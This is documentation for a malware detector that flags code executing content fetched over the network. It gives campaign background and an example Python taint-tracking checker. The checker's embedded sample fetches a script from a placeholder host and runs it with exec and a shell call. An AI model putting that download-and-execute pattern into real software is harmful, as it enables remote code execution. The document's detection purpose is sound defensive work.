Downloaded Code Execution
ID: downloaded_code_execution
Severity: high
Resource: Execution
Tags: evader, trojan
Description
This detector looks for code that executes or evaluates code received in the response to an external request.
Rationale
Usually, after infecting the system, the malicious code downloads additional malware binaries or source files, generally fetching them from a malicious site.
Once downloaded, they are executed to load the attackers' full malware toolkit. When the toolkit is loaded, the malware binary is ready to communicate with the Command and Control (C&C) host.
Related Malware campaigns
These are some popular campaigns using this technique:
- 3CX Supply Chain Attack unfolded in March 2023 as a significant supply chain security breach. The assailants successfully infiltrated applications by incorporating a compromised library file, leading to the subsequent download of an encrypted file housing Command & Control information. The affected software ran a downloader, SUDDENICON, which in turn received additional command and control (C2) servers from encrypted icon files hosted on GitHub. The decrypted C2 server was used to download a third stage identified as ICONICSTEALER, a dataminer that steals browser information.
- DEADEYE functions as a malware launcher utilized by APT41, and its usage dates back to at least May 2021.
- Earth Lusca is an alleged cyber espionage group believed to be based in China, exhibiting activity since at least April 2019.
- Lokibot is an extensively disseminated information-stealing tool first identified in 2015. Its primary function involves extracting sensitive data such as usernames, passwords, cryptocurrency wallets, and various credentials. Furthermore, Lokibot can establish a backdoor in compromised systems, enabling attackers to introduce additional payloads.
- Remsec serves as a modular backdoor employed by Strider, showcasing indications of being primarily designed for espionage purposes.
- StrifeWater operates as a remote-access tool utilized by Moses Staff in the initial stages of their attacks, with a documented presence since at least November 2021.
Configuration
The detector has the following configurable parameters:
- sources, which indicates the source kinds to check. Available values are:
  - external_input
- sinks, which indicates the sink kinds to check. Available values are:
  - command_injection
  - code_injection
- neutralizations, which indicates the neutralization kinds to check. By default, this is empty: no neutralizers are considered for potentially malicious code.
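As an added example (not the detector's own implementation), the following script applies the rule from the Description to Python source with a deliberately simple taint model: values returned by HTTP fetch calls (the external_input source kind) are tracked through plain assignments, and a finding is reported when one reaches an exec/eval or shell-command sink, labelled with the sink kind from the Configuration section. The source and sink call sets, the kind mapping and the two sample snippets are assumptions constructed for this demonstration.

```python
import ast

# Constructed samples (not from any real campaign): a downloader that evaluates
# and executes fetched content, and a benign fetch that only parses JSON.
SUSPICIOUS_SAMPLE = """
import requests, subprocess
resp = requests.get("https://example.invalid/stage2.py")
payload = resp.text
exec(payload)
subprocess.run(payload, shell=True)
"""
BENIGN_SAMPLE = """
import json, requests
settings = json.loads(requests.get("https://example.invalid/config.json").text)
"""

# Source and sink kinds mirror the detector's parameter names (assumed mapping).
SOURCE_CALLS = {"requests.get", "requests.post", "urlopen", "urllib.request.urlopen"}
SINKS = {"exec": "code_injection", "eval": "code_injection",
         "os.system": "command_injection", "subprocess.run": "command_injection"}

def _dotted(node):
    """Return the dotted name of a Name/Attribute chain, or None."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None

def _reads_source(node, tainted):
    """True if the expression calls a source or mentions a tainted variable."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Call) and _dotted(sub.func) in SOURCE_CALLS:
            return True
        if isinstance(sub, ast.Name) and sub.id in tainted:
            return True
    return False

def find_downloaded_code_execution(src):
    """Return (line, sink_kind) for every sink whose argument derives from a response."""
    tainted, findings = set(), []
    # Visit nodes in source order so assignments are seen before their uses.
    for node in sorted(ast.walk(ast.parse(src)), key=lambda n: getattr(n, "lineno", 0)):
        if isinstance(node, ast.Assign) and _reads_source(node.value, tainted):
            tainted.update(t.id for t in node.targets if isinstance(t, ast.Name))
        elif isinstance(node, ast.Call) and _dotted(node.func) in SINKS:
            if any(_reads_source(a, tainted) for a in node.args):
                findings.append((node.lineno, SINKS[_dotted(node.func)]))
    return findings
```

Because the model only follows simple name-to-name assignments, content routed through containers, attributes or function boundaries is missed; that is the gap a real detector closes with proper dataflow analysis.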